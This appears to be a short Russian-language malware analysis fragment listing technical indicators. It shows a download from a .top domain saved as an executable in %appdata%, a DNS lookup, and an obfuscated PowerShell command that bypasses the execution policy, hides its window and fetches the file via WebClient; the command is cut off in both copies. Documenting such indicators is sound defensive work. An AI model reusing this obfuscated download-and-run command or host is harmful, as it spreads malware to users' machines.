Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^o^w^eRSHE^Ll.ex^E -EX^EcutiOnPOLI^cy ^bypA^SS -^nOPr^OfIl^e -winDOwsTyL^E^ hiDde^n (^nEw-^O^bj^e^cT sysTE^m^.^NEt^.weBcL^ieNt).D^OwN^lo^ADfI^LE('http://newyeargoka.top/read.php...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "P^o^w^eRSHE^Ll.ex^E -EX^EcutiOnPOLI^cy ^bypA^SS -^nOPr^OfIl^e -winDOwsTyL^E^ hiDde^n (^nEw-^O^bj^e^cT sysTE^m^.^NEt^.weBcL^ieNt).D^OwN^lo^ADfI^LE('http://newyeargoka.top/read.php...' (со скрытым окном)